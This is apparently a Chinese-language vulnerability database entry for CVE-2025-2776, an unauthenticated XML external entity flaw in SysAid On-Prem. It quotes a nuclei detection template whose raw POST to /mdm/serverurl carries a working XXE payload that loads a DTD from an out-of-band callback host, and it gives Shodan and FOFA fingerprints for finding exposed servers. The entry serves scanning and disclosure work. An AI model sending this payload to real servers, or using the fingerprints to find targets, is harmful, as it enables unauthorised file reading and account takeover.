漏洞信息
漏洞名称: SysAid On-Prem XML External Entity Vulnerability
漏洞编号:
漏洞类型: XML实体注入
漏洞等级: 严重
漏洞描述: SysAid On-Prem是一款广泛使用的IT服务管理软件,为企业提供IT服务台、资产管理、远程控制等功能,通常部署在企业内部网络中,用于支持IT服务管理流程。该软件因其功能全面和易用性,在全球范围内有广泛的应用。此次发现的漏洞属于XML外部实体注入(XXE)类型,攻击者可以通过构造恶意的XML请求,利用服务器对XML文档解析时的漏洞,读取服务器上的任意文件或执行远程代码。具体来说,漏洞存在于SysAid On-Prem的Server URL处理功能中,由于未对用户提交的XML数据进行严格的验证和过滤,导致攻击者可以注入恶意的外部实体引用,进而实现未授权的文件读取或管理员账户接管。这种漏洞的利用不需要任何形式的认证,攻击者可以通过网络直接发起攻击,且攻击过程可以自动化执行,对受影响系统构成严重威胁。成功利用此漏洞的攻击者可以获取敏感信息,如配置文件、密码文件等,甚至可能完全控制受影响的系统,导致数据泄露、服务中断等严重后果。
产品厂商: sysaid
产品名称: SysAid On-Prem
影响版本: <= 23.3.40
搜索语法: icon_hash=1540720428
来源: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-2776.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
id: CVE-2025-2776
info:
name: SysAid On-Prem <= 23.3.40 - XML External Entity
author: johnk3r
severity: critical
description: |
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
reference:
- https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- https://documentation.sysaid.com/docs/24-40-60
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2025-2776
cwe-id: CWE-611
metadata:
max-request: 1
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:"1540720428"
fofa-query: icon_hash=1540720428
tags: cve,cve2025,sysaid,xxe,oast,kev
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /mdm/serverurl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%foo;
]>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 4a0a004730450221009ffafa0476d394123979effc151d2ac8c727f3be02eeda0c11df177569e6f4b1022035f504c432fe0de8f23d93ac9b46f01e0e7380f2a0e202f7c2762f5e24d1583d:922c64590222798bb761d5b6d8e72950
|